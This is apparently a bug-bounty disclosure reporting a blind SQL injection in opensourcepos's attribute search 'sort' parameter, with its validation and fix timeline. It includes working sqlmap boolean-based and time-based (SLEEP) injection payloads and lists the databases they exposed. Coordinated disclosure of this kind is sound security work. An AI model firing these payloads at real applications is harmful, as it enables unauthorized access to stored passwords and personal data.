SQL Injection in opensourcepos/opensourcepos

Valid

Reported on

Aug 26th 2021


✍️ Description

The Application is vulnerable to blind SQL Injection

🕵️‍♂️ Proof of Concept

URL: https://dev.opensourcepos.org/attributes/search?sort=1 Vulnerable Parameter: sort

SQLMap POC

---
Parameter: sort (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=(SELECT (CASE WHEN (5937=5937) THEN 1 ELSE (SELECT 4996 UNION SELECT 4231) END))

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=1 AND (SELECT 3335 FROM (SELECT(SLEEP(5)))uafX)
---
available databases [2]:
[*] information_schema
[*] ospos

💥 Impact

SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands. A successful SQL injection attack can result in unauthorized access to sensitive data, such as (hashed) passwords, credit card details, or personal user information.

Occurences

References

Ziding Zhang
3 months ago

Admin


Hey Melbin, I've just emailed the repo maintainer about this report.

We have contacted a member of the opensourcepos team and are waiting to hear back 3 months ago
opensourcepos/opensourcepos maintainer validated this vulnerability 3 months ago
Melbin Mathew Antony has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos confirmed that a fix has been merged on b4c48e 3 months ago
jekkos has been awarded the fix bounty